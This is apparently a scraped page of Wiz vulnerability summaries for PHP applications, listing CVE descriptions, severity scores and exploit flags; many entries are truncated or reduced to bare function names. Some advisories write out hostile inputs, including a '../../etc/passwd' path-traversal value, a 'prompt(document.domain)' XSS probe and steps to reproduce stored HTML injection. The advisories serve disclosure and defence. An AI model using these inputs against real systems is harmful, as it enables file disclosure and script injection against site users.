Cross Site Scripting vulnerability in the "/admin/order/abandoned" endpoint of Microweber 2.0.19. An attacker can manipulate the "orderDirection" parameter in a crafted URL and lure a user with admin privileges into visiting it, achieving JavaScript code execution in the victim's browser. The issue was reported to the developers and fixed in version 2.0.20.
Source : NVD
Score 6.1
Published February 5, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
microweber/microweber
Sources
NVD
Wiz
CVE-2026-33488 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
## CVE-2026-33488 : PHP vulnerability analysis and mitigation
Referenced in the advisory: `createKeys()`, `generateKeys.json.php`, `encryptMessage.json.php`.
Source : NVD
Score 8.1
Published March 23, 2026
Severity HIGH
CNA Score 7.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
Wiz
CVE-2026-35544 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## CVE-2026-35544 : PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. Insufficient Cascading Style Sheets (CSS) sanitization in HTML e-mail messages may lead to a fixed-position mitigation bypass via the use of !important.
Source : NVD
Score 5.3
Published April 3, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube/roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Echo Severity MEDIUM Has Fix Added at: Apr 0
Wiz
CVE-2026-33883 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
## CVE-2026-33883 : PHP vulnerability analysis and mitigation
Referenced in the advisory: `user:reset_password_form`.
Source : NVD
Score 6.1
Published March 27, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 29, 2026
Wiz
GHSA-mgr9-6c2j-jxrq [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## GHSA-mgr9-6c2j-jxrq : PHP vulnerability analysis and mitigation
Message from the Pterodactyl team:
The Pterodactyl team has evaluated this as a minor security issue but does not consider it something that should be assigned a CVE, nor does it require active patching by vulnerable systems.
This issue is entirely self-inflicted and requires that an administrative user paste an obviously incorrect value into a database host field, submit it, and run into the XSS when the error message is rendered. However, we have determined that this fix is good security hygiene and may prevent issues in other areas not yet discovered.
## Summary
Referenced in the advisory: `Host`, `gethostaddr`, `prompt(document.domain)`.
Source : NVD
Score 2
Published December 30, 2025
Severity LOW
CNA Score N/A
Wiz
CVE-2024-58303 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
## CVE-2024-58303 : PHP vulnerability analysis and mitigation
FoF Pretty Mail 1.1.2 contains a server-side template injection vulnerability that allows administrative users to inject malicious code into email templates. Attackers can execute system commands by inserting crafted template expressions that trigger arbitrary code execution during email generation.
Source : NVD
Score 8.6
Published December 11, 2025
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fof/pretty-mail
Sources
NVD
Composer Severity HIGH No Fix Added at: Dec 12, 2025
Wiz
CVE-2026-28423 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
## CVE-2026-28423 : PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.11 and 6.4.0, when Glide image manipulation is used in insecure mode (which is not the default), the image proxy can be abused by an unauthenticated user to make the server send HTTP requests to arbitrary URLs—either via the URL directly or via the watermark feature. That can allow access to internal services, cloud metadata endpoints, and other hosts reachable from the server. This has been fixed in 5.73.11 and 6.4.0.
Source : NVD
Score 8.6
Published February 27, 2026
Severity HIGH
CNA Score 6.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-25493 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
## CVE-2026-25493 : PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the saveAsset GraphQL mutation validates the initial URL hostname and resolved IP against a blocklist, but Guzzle follows HTTP redirects by default. An attacker can bypass all SSRF protections by hosting a redirect that points to cloud metadata endpoints or any internal IP addresses. This issue is patched in versions 4.16.18 and 5.8.22.
Source : NVD
Score 6.9
Published February 9, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-31824 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
## CVE-2026-31824 : PHP vulnerability analysis and mitigation
Sylius is an Open Source eCommerce Framework on Symfony. A Time-of-Check To Time-of-Use (TOCTOU) race condition was discovered in the promotion usage limit enforcement. The same class of vulnerability affects the promotion usage limit (the global used counter on Promotion entities), coupon usage limit (the global used counter on PromotionCoupon entities), and coupon per-customer usage limit (the per-customer redemption count on PromotionCoupon entities). In all three cases, the eligibility check reads the used counter (or order count) from an in-memory Doctrine entity during validation, while the actual usage increment in OrderPromotionsUsageModifier happens later during order completion — with no database-level locking or ato
Wiz
CVE-2026-33886 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
## CVE-2026-33886 : PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Starting in version 5.7.12 and prior to versions 5.73.16 and 6.7.2, a control panel user with access to Antlers-enabled fields could access sensitive application configuration values by inserting config variables into their content. This has been fixed in 5.73.16 and 6.7.2.
Source : NVD
Score 6.5
Published March 27, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Wiz
CVE-2026-34563 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
## CVE-2026-34563 : PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when handling backup uploads and processing backup metadata. An attacker can inject a malicious JavaScript payload into the backup filename via the uploaded xss.sql, which uses SQL functionality to insert the XSS payload server-side. This stored payload is later rendered unsafely in multiple backup management views without proper output encoding, leading to stored blind cross-site scripting (Blind XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
Score 9.1
Published Apri
Wiz
GHSA-qrfh-cc86-vc8c [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
## GHSA-qrfh-cc86-vc8c : PHP vulnerability analysis and mitigation
## Summary
Referenced in the advisory: `firstname`, `lastname`.
## Vulnerable File
app/Domain/Users/Templates/editUser.tpl.php
## Vulnerable Code (Lines ~14-17)
Two `value=""` attributes; these fields output raw user input without sanitization.
## Steps to Reproduce
Login as admin > Go to Settings > Users > Edit any user
Enter HTML containing `INJECTED` into the `firstname` or `lastname` field
Save the user profile
Create or view an article — the injected HTML renders in the author name
## Fix
Escape the `echo` output with `htmlspecialchars()` in both `value=""` attributes, or use `$this->e()`; apply the same fix in `editOwn.tpl.php`.
## Impact
Stored HTML injection visible to all users viewing affected content
Can be used for phishing, fake login forms, and UI defacement
Affects all versions before 3.3.0
Source : NVD
Score 5.4
Published March 5, 2026
Wiz
CVE-2026-32817 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
## CVE-2026-32817 : PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the documents and files module does not verify whether the current user has permission to delete folders or files. The folder_delete and file_delete action handlers in modules/documents-files.php only perform a VIEW authorization check (getFolderForDownload / getFileForDownload) before calling delete(), and they never validate a CSRF token. Because the target UUIDs are read from $_GET, deletion can be triggered by a plain HTTP GET request. When the module is in public mode (documents_files_module_enabled = 1) and a folder is marked public (fol_public = true), an unauthenticated attacker can permanently destroy the entire document library. Even
Wiz
CVE-2026-33764 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
## CVE-2026-33764 : PHP vulnerability analysis and mitigation
Referenced in the advisory: `save.json.php`, `$_REQUEST['id']`.
Source : NVD
Score 4.3
Published March 27, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
Wiz
CVE-2026-34560 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
## CVE-2026-34560 : PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application renders user-controlled input unsafely within the logs interface. If any stored XSS payload exists within logged data, it is rendered without proper output encoding. This issue becomes a Blind XSS scenario because the attacker does not see immediate execution. Instead, the payload is stored within application logs and only executes later when an administrator views the logs page. This issue has been patched in version 0.31.0.0.
Source : NVD
Score 9.1
Published April 1, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Wiz
CVE-2026-33183 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0
## CVE-2026-33183 : PHP vulnerability analysis and mitigation
Saloon is a PHP library that gives users tools to build API integrations and SDKs. Prior to version 4.0.0, fixture names were used to build file paths under the configured fixture directory without validation. A name containing path segments (e.g. ../traversal or ../../etc/passwd) resulted in a path outside that directory. When the application read a fixture (e.g. for mocking) or wrote one (e.g. when recording responses), it could read or write files anywhere the process had access. If the fixture name was derived from user or attacker-controlled input (e.g. request parameters or config), this constituted a path traversal vulnerability and could lead to disclosure of sensitive files or overwriting of critical files. The fix in
Wiz
CVE-2026-26273 [CRITICAL] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
## CVE-2026-26273 : PHP vulnerability analysis and mitigation
Known is a social publishing platform. Prior to 1.6.3, a Critical Broken Authentication vulnerability exists in Known 1.6.2 and earlier. The application leaks the password reset token within a hidden HTML input field on the password reset page. This allows any unauthenticated attacker to retrieve the reset token for any user by simply querying the user's email, leading to full Account Takeover (ATO) without requiring access to the victim's email inbox. This vulnerability is fixed in 1.6.3.
Source : NVD
Score 9.8
Published February 13, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-34739 [MEDIUM] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
## CVE-2026-34739 : PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the User_Location plugin's testIP.php page reflects the ip request parameter directly into an HTML input element without applying htmlspecialchars() or any other output encoding. This allows an attacker to inject arbitrary HTML and JavaScript via a crafted URL. Although the page is restricted to admin users, AVideo's SameSite=None cookie configuration allows cross-origin exploitation, meaning an attacker can lure an admin to a malicious link that executes JavaScript in their authenticated session. At time of publication, there are no publicly available patches.
Source : NVD
Score 6.1
Published March 31, 2026
Severity MEDIUM
CNA Score 6.1
Wiz
CVE-2026-3105 [HIGH] Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
## CVE-2026-3105 : PHP vulnerability analysis and mitigation
Summary: This advisory addresses a SQL injection vulnerability in the API endpoint used for retrieving contact activities. A vulnerability exists in the query construction for the Contact Activity timeline where the parameter responsible for determining the sort direction was not strictly validated against an allowlist, potentially allowing authenticated users to inject arbitrary SQL commands via the API.
Mitigation: Please update to 4.4.19, 5.2.10, 6.0.8, 7.0.1 or later.
Workarounds: None.
References: If you have any questions or comments about this advisory:
Email us at [email protected]
Source : NVD
## 8.8
Score
Published February 24, 2026
Severity HIGH
CNA Score 7.6
Affected Technologies
PHP
Has Public Exploit No
Wiz
CVE-2026-4587 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4587 [MEDIUM] CVE-2026-4587 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4587 :
PHP vulnerability analysis and mitigation
A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This attack is characterized by high complexity. The exploitability is assessed as difficult. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 6.3
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-34989 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2026-34989 [CRITICAL] CVE-2026-34989 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34989 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to 31.0.0.0, the application fails to properly sanitize user-controlled input when users update their profile name (e.g., full name / username). An attacker can inject a malicious JavaScript payload into their profile name, which is then stored server-side. This stored payload is later rendered unsafely in multiple application views without proper output encoding, leading to stored cross-site scripting (XSS). This vulnerability is fixed in 31.0.0.0.
Source : NVD
## 9.4
Score
Published April 6, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
PHP
Wiz
CVE-2026-31889 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-31889 [HIGH] CVE-2026-31889 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31889 :
PHP vulnerability analysis and mitigation
Shopware is an open commerce platform. Prior to 6.6.10.15 and 6.7.8.1, a vulnerability in the Shopware app registration flow could, under specific conditions, allow attackers to take over the communication channel between a shop and an app. The legacy app registration flow used HMAC‑based authentication without sufficiently binding a shop installation to its original domain. During re‑registration, the shop-url could be updated without proving control over the previously registered shop or domain. This made targeted hijacking of app communication feasible if an attacker possessed the relevant app‑side secret. By abusing app re‑registration, an attacker could redirect app traffic to an attacker‑controlled domain and potent
Wiz
CVE-2026-33035 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33035 [MEDIUM] CVE-2026-33035 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33035 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 25.0 and below, there is a reflected XSS vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript in a victim's browser. User input from a URL parameter flows through PHP's json_encode() into a JavaScript function that renders it via innerHTML, bypassing encoding and achieving full script execution. The vulnerability is caused by two issues working together: unescaped user input passed to JavaScript (videoNotFound.php), and innerHTML rendering HTML tags as executable DOM (script.js). The attack can be escalated to steal session cookies, take over accounts, phish credentials via injected login forms, spread self-propagating payloads, and compro
Wiz
CVE-2026-28425 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0
CVE-2026-28425 [HIGH] CVE-2026-28425 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28425 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, an authenticated control panel user with access to Antlers-enabled inputs may be able to achieve remote code execution in the application context. That can lead to full compromise of the application, including access to sensitive configuration, modification or exfiltration of data, and potential impact on availability. Exploitation is only possible where Antlers runs on user-controlled content—for example, content fields with Antlers explicitly enabled (requiring permission to configure fields and to edit entries), built-in config that supports Antlers such as Forms email notification settings (requiring configuration p
Wiz
CVE-2026-32262 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-32262 [MEDIUM] CVE-2026-32262 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32262 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.5 and from version 5.0.0-RC1 to before version 5.9.11, the AssetsController->replaceFile() method has a targetFilename body parameter that is used unsanitized in a deleteFile() call before Assets::prepareAssetName() is applied on save. This allows an authenticated user with replaceFiles permission to delete arbitrary files within the same filesystem root by injecting ../ path traversal sequences into the filename. This could allow an authenticated user with replaceFiles permission on one volume to delete files in other folders/volumes that share the same filesystem root. This only affects local filesystems. This issue has been patched
Wiz
CVE-2026-33770 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-33770 [HIGH] CVE-2026-33770 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33770 :
PHP vulnerability analysis and mitigation
fixCleanTitle()
objects/category.php
$clean_title
$id
Source : NVD
## 7.1
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Wiz
CVE-2026-23493 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-23493 [HIGH] CVE-2026-23493 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23493 :
PHP vulnerability analysis and mitigation
Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, the http_error_log file stores the $_COOKIE and $_SERVER variables, which means sensitive information such as database passwords, cookie session data, and other details can be accessed or recovered through the Pimcore backend. This vulnerability is fixed in 12.3.1 and 11.5.14.
Source : NVD
## 4.9
Score
Published January 15, 2026
Severity MEDIUM
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pimcore/pimcore
Sources
Wiz
CVE-2026-32276 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-32276 [HIGH] CVE-2026-32276 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32276 :
PHP vulnerability analysis and mitigation
Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, an authenticated user may be able to execute arbitrary code in the Code Study Plugin. Versions 1.41.1 and 2.41.1 contain a patch.
Source : NVD
## 8.8
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
opensource-workshop/connect-cms
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 24, 2026
Wiz
CVE-2026-35537 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35537 [MEDIUM] CVE-2026-35537 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35537 :
PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. Unsafe deserialization in the redis/memcache session handler may lead to arbitrary file write operations by unauthenticated attackers via crafted session data.
Source : NVD
## 3.7
Score
Published April 3, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube/roundcubemail
roundcube
Sources
NVD
Debian 12, 13, 14 Severity LOW Has Fix Added at: Apr 05, 2026
Echo Severity LOW Has Fix Added at: Apr 05, 2026
Wiz
CVE-2026-27128 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-27128 [MEDIUM] CVE-2026-27128 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27128 :
PHP vulnerability analysis and mitigation
getTokenRoute()
Source : NVD
## 6.9
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:craftcms:craft_cms
craftcms/cms
Sources
Composer Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 24, 2026
Windows Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 03, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 03, 2026
Wiz
CVE-2026-34729 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-34729 [MEDIUM] CVE-2026-34729 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34729 :
PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, there is a stored XSS vulnerability via Regex Bypass in Filter::removeAttributes(). This issue has been patched in version 4.1.1.
Source : NVD
## 6.1
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
phpmyfaq/phpmyfaq
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Apr 02, 2026
Wiz
CVE-2026-33237 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-33237 [MEDIUM] CVE-2026-33237 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33237 :
PHP vulnerability analysis and mitigation
run()
plugin/Scheduler/Scheduler.php
url_get_contents()
callbackURL
isValidURL()
isSSRFSafeURL()
callbackURL
Source : NVD
## 5.5
Score
Published March 21, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 20, 2026
Wiz
CVE-2026-34567 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34567 [CRITICAL] CVE-2026-34567 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34567 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog posts within the Categories section. An attacker can inject a malicious JavaScript payload into the Categories content, which is then stored server-side. This stored payload is later rendered unsafely when the Categories are viewed via blog posts, without proper output encoding, leading to stored cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Score
Published April 1, 2026
Severity CRITICAL
CNA Score 9.1
Wiz
CVE-2026-33080 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2026-33080 [HIGH] CVE-2026-33080 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33080 :
PHP vulnerability analysis and mitigation
Filament is a collection of full-stack components for accelerated Laravel development. Versions 4.0.0 through 4.8.4 and 5.0.0 through 5.3.4 have two Filament Table summarizers (Range, Values) that render raw database values without escaping HTML. If there is a lack of validation for the data in the columns that use these summarizers, an attacker could plant malicious HTML / JavaScript and achieve stored XSS that executes for users who view the table with those summarizers. This issue has been patched in versions 4.8.5 and 5.3.5.
Source : NVD
## 5.4
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 7.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-21896 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-21896 [MEDIUM] CVE-2026-21896 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21896 :
PHP vulnerability analysis and mitigation
Kirby is an open-source content management system. From versions 5.0.0 to 5.2.1, Kirby is missing permission checks in the content changes API. This vulnerability affects all Kirby sites where user permissions are configured to prevent specific role(s) from performing write actions, specifically by disabling the update permission with the intent to prevent modifications to site content. This vulnerability does not affect those who have not deviated from the default user permissions. This issue has been patched in version 5.2.2.
Source : NVD
## 5.8
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-34611 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34611 [MEDIUM] CVE-2026-34611 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34611 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo endpoint objects/emailAllUsers.json.php allows administrators to send HTML emails to every registered user on the platform. While the endpoint verifies admin session status, it does not validate a CSRF token. Because AVideo sets SameSite=None on session cookies, a cross-origin POST request from an attacker-controlled page will include the admin's session cookie automatically. An attacker who lures an admin to a malicious page can send an arbitrary HTML email to every user on the platform, appearing to originate from the instance's legitimate SMTP address. At time of publication, there are no publicly available patches.
Source : NVD
## 6.5
Wiz
CVE-2026-33296 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.1
CVE-2026-33296 [LOW] CVE-2026-33296 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33296 :
PHP vulnerability analysis and mitigation
document.location
Source : NVD
## 2.1
Score
Published March 22, 2026
Severity LOW
CNA Score 2.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity LOW No Fix Added at: Mar 20, 2026
Wiz
CVE-2026-28696 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-28696 [HIGH] CVE-2026-28696 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28696 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 4.17.0-beta.1 and 5.9.0-beta.1, the GraphQL directive @parseRefs, intended to parse internal reference tags (e.g., {user:1:email}), can be abused by both authenticated users and unauthenticated guests (if a Public Schema is enabled) to access sensitive attributes of any element in the CMS. The implementation in Elements::parseRefs fails to perform authorization checks, allowing attackers to read data they are not authorized to view. This vulnerability is fixed in 4.17.0-beta.1 and 5.9.0-beta.1.
Source : NVD
## 8.7
Score
Published March 4, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
CVE-2026-24416 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-24416 [HIGH] CVE-2026-24416 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24416 :
PHP vulnerability analysis and mitigation
